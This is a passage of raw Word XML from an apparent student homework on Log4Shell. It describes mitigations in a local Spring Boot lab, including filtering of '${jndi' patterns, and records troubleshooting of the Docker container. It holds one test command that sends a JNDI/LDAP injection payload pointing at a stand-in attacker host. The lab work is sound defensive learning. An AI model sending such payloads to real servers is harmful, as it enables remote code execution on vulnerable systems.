          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The older version had the flaw and hackers could trick into running code form the internet. The new version has fixed this problem making it harder for hackers to take advantage of this vulnerability. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E135F7A" w14:textId="77777777" w:rsidR="009F01AC" w:rsidRPr="009F01AC" w:rsidRDefault="009F01AC" w:rsidP="009F01AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Added input validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69861199" w14:textId="77777777" w:rsidR="009F01AC" w:rsidRPr="009F01AC" w:rsidRDefault="009F01AC" w:rsidP="009F01AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>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00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Switched @GetMapping to @PostMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F5AEA8" w14:textId="6C93027D" w:rsidR="009F01AC" w:rsidRPr="009F01AC" w:rsidRDefault="009F01AC" w:rsidP="009F01AC">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800"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This change makes the app safer by requiring users to send date in a more secure way – in the body of the message versus address sbar. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E490699" w14:textId="77777777" w:rsidR="009F01AC" w:rsidRPr="009F01AC" w:rsidRDefault="009F01AC" w:rsidP="009F01AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>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00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Used @RequestBody instead of query parameters </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5904D858" w14:textId="77777777" w:rsidR="009F01AC" w:rsidRPr="009F01AC" w:rsidRDefault="009F01AC" w:rsidP="009F01AC">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800"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Now the app reads the entire message body, which gives better control and visibility over what people are sending. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFE4C87" w14:textId="77777777" w:rsidR="009F01AC" w:rsidRPr="009F01AC" w:rsidRDefault="009F01AC" w:rsidP="009F01AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>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alibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Checked for hacking patters like ${jndi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D9EDE9" w14:textId="4F268078" w:rsidR="001C4D3B" w:rsidRPr="009F01AC" w:rsidRDefault="009F01AC" w:rsidP="009F01AC">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800"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This filters incoming messages that may include a suspicious pattern and blocks them. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70962251" w14:textId="4B1315C1" w:rsidR="009F01AC" w:rsidRPr="009F01AC" w:rsidRDefault="009F01AC" w:rsidP="009F01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rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Together these steps will help mitigate hackers ability to infiltrate the we application. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF5F1DD" w14:textId="77777777" w:rsidR="009F01AC" w:rsidRPr="009F01AC" w:rsidRDefault="009F01AC" w:rsidP="009F01A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720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B83E75B" w14:textId="07D8E62B" w:rsidR="004D77D7" w:rsidRDefault="009F01AC" w:rsidP="009F01AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing the Defense </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EDAC8C" w14:textId="46A8BC4D" w:rsidR="00335F4E" w:rsidRDefault="00335F4E" w:rsidP="00335F4E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00335F4E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>curl -X POST http://localhost:8080/log -H "Content-Type: text/plain" -d '${jndi:ldap://attacker.com:1389/a}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62520B81" w14:textId="40E69A95" w:rsidR="00335F4E" w:rsidRDefault="00335F4E" w:rsidP="00335F4E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00335F4E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This did not work, it kept saying method not allowed. I checked the LogController file to ensure we had post mapping, restarted docker compose, but still wont work. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E203389" w14:textId="29F844C7" w:rsidR="00335F4E" w:rsidRDefault="00335F4E" w:rsidP="00335F4E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Benign request did not work either. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B2520B" w14:textId="4EC369E1" w:rsidR="001012E6" w:rsidRDefault="00335F4E" w:rsidP="00B11385">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00335F4E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Part 3: Incident Response (MITRE REACT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5378AC96" w14:textId="44AC69E9" w:rsidR="000E2C4A" w:rsidRPr="000E2C4A" w:rsidRDefault="000E2C4A" w:rsidP="000E2C4A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2C4A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">So seems like the log4shell-homework-app1 was created but not up. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">See below </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F660856" w14:textId="0DAF92F6" w:rsidR="000E2C4A" w:rsidRDefault="000E2C4A" w:rsidP="000E2C4A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2C4A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23A59DD8" wp14:editId="0244ADAC">
            <wp:extent cx="5943600" cy="2597150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1668342140"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42140" name="Picture 1" descr="A computer screen shot of white text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2597150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9A958D" w14:textId="45A301B8" w:rsidR="000E2C4A" w:rsidRDefault="000E2C4A" w:rsidP="000E2C4A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2C4A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">So we have to resolve this first </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65579C64" w14:textId="543FB40F" w:rsidR="000E2C4A" w:rsidRDefault="000E2C4A" w:rsidP="000E2C4A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">We are getting </w:t>
      </w:r>
      <w:r w:rsidRPr="000E2C4A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Error: listen tcp4 0.0.0.0:8080: bind: address already in use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268B990F" w14:textId="6D4B7BE1" w:rsidR="000E2C4A" w:rsidRDefault="000E2C4A" w:rsidP="000E2C4A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2C4A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Meaning something is already using port 8080. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">So we have to unbind it first </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E5513C" w14:textId="109B7119" w:rsidR="000E2C4A" w:rsidRPr="000E2C4A" w:rsidRDefault="000E2C4A" w:rsidP="000E2C4A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2C4A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">I found out what is using it, killed the process, and restarted docker </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B698F2A" w14:textId="354C0B63" w:rsidR="000E2C4A" w:rsidRDefault="000E2C4A" w:rsidP="000E2C4A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2C4A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="415D9FE5" wp14:editId="77E51B9F">
            <wp:extent cx="5943600" cy="1054735"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="74647486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74864" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1054735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA6280E" w14:textId="12A52087" w:rsidR="000E2C4A" w:rsidRPr="000E2C4A" w:rsidRDefault="000E2C4A" w:rsidP="000E2C4A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2C4A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I checked logs and got below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BFE0DA" w14:textId="60E4A30D" w:rsidR="000E2C4A" w:rsidRDefault="000E2C4A" w:rsidP="000E2C4A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2C4A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E500CC7" wp14:editId="1021FDC3">
            <wp:extent cx="5943600" cy="1419225"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2099745319"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45319" name="Picture 1" descr="A black and white text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1419225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B18DBF7" w14:textId="4C4644D5" w:rsidR="000E2C4A" w:rsidRDefault="000E2C4A" w:rsidP="000E2C4A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I have seen this before!!! This tells us</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA6A575" w14:textId="36C3FD34" w:rsidR="000E2C4A" w:rsidRPr="000E2C4A" w:rsidRDefault="000E2C4A" w:rsidP="000E2C4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2C4A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Spring Boot v2.5.5 has started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03264170" w14:textId="2255B540" w:rsidR="000E2C4A" w:rsidRPr="000E2C4A" w:rsidRDefault="000E2C4A" w:rsidP="000E2C4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2C4A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Tomcat is running on port 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA9278C" w14:textId="37CDD87D" w:rsidR="000E2C4A" w:rsidRPr="000E2C4A" w:rsidRDefault="000E2C4A" w:rsidP="000E2C4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2C4A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Your main class Log4ShellDemoApplication initialized successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5F191B" w14:textId="4B119C34" w:rsidR="000E2C4A" w:rsidRDefault="000E2C4A" w:rsidP="000E2C4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2C4A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>No crash, no errors — the app is alive inside the container (log4shell-homework-app-1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248FCFF5" w14:textId="7B434DB3" w:rsidR="00DB2051" w:rsidRDefault="00DB2051" w:rsidP="00DB2051">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Checked for Docker logs to see if we have ${jndi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7EDCFA" w14:textId="3DE89263" w:rsidR="00DB2051" w:rsidRDefault="00DB2051" w:rsidP="00DB2051">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
